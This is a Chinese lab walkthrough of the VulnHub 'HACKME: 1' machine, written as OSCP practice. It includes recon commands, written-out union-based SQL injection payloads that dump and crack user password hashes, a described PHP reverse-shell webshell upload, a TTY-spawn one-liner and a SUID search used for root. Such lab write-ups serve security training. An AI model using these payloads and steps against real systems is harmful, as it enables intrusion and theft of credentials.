-
---------------------------------------------------
-
本文阅读时间推荐20min,靶场练习推荐3H
-
---------------------------------------------------
-
OSCP相关技术(备考中) -
CISSP备考经验(已通过认证) -
CCSK(云安全)(已通过认证) -
ISO/IEC 27001 Foundation(已通过认证)
一、前言
主要利用方式:sql注入+文件上传+SUID权限执行
二、靶机信息
靶场: vulnhub.com靶机名称: HACKME: 1难度: 简单发布时间: 2019年 7月 18日下载地址:https://www.vulnhub.com/entry/hackme-1,330/备注:在考试的时候不允许用sqlmap,sql注入还是要多练习手工注入
三、虚拟机配置
Vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配攻击IP:192.168.139.130靶机IP:192.168.139.132
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0-l
2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.2.10
└─$ sudo nmap -p22,80 -sV -A 10.0.2.10
3、常规访问80端口及路径扫描
└─$ dirsearch -u http://192.168.139.132
└─$ dirb http://192.168.139.132/ 
4、继续访问login页面及uploads页面
http://192.168.139.132/login.php
http://192.168.139.132/uploads/
五、漏洞利用(突破边界)
5、登录界面尝试弱口令和sql注入,皆尝试无果
7、发现存在注册界面,遂注册用户admin,提交
使用账号密码登录(admin/123456)
8、在搜索框中,无命令执行漏洞,但存在sql注入
通过1=1 及1=2 就能简单的判断出搜索框中存在字符型(单引号)sql注入
OSINT' and 1=1#
OSINT' and 1=2#
9、尝试通过sql注入,获取用户账号及密码
9.1:先使用order by快速判断存在多少列,通过判断,发现一共3列
search=OSINT' order by 3#
search=OSINT' order by 4#
9.2:使用union判断显示位置
search=OSINT' union select 1,2,3#
对比web页面
9.3:查看当前数据库位置
search=OSINT' union select database(),2,3#
9.4:查看数据库中存在的表
OSINT' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
9.5:查询user表的列
OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
9.6:查询所有用户名及密码
OSINT' union select group_concat(user),group_concat(pasword),3 from users#
https://www.somd5.com/
|
user |
pasword |
MD5明文 |
user1 |
5d41402abc4b2a76b9719d911017c592 |
hello |
user2 |
6269c4f71a55b24bad0f0267d9be5508 |
commando |
user3 |
0f359740bd1cda994f8b55330c86d845 |
p@ssw0rd |
test |
05a671c66aefea124cc08b76ea6d30bb |
testtest |
superadmin |
2386acb2cf356944177746fc92523983 |
Uncrackable |
test1 |
05a671c66aefea124cc08b76ea6d30bb |
testtest |
admin |
e10adc3949ba59abbe56e057f20f883e |
123456 |
10、尝试使用最复杂的用户名及密码登录(superadmin/Uncrackable)
http://192.168.139.132/welcomeadmin.php发现可以存在上传,正好印证了开头扫描出来的上传路径
11、设置好反弹shell的回连ip及端口,尝试上传,可以直接上传php的webshell
目录中发现rps.php 上传上来了
12、攻击机开启监听,再访问webshell文件
开启监听
访问webshell链接
发现成功反弹shell连接,并验证id权限,成功获取了www-data的权限
13、提升交互式tty
python -c "import pty;pty.spawn('/bin/bash')"
六、提权
14、全局搜索SUID权限程序
?>www-data: find / -perm -u=s -type f 2>/dev/null
15、进入对应的目录,并查看详情
www-data@hackme:/$ cd /home/legacy
16、执行touchmenot文件,验证权限,成功拿到root权限,并验证IP
www-data@hackme:/home/legacy$ ./touchmenot
root@hackme:/root# ip a
原文始发于微信公众号(从放弃到入门):【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论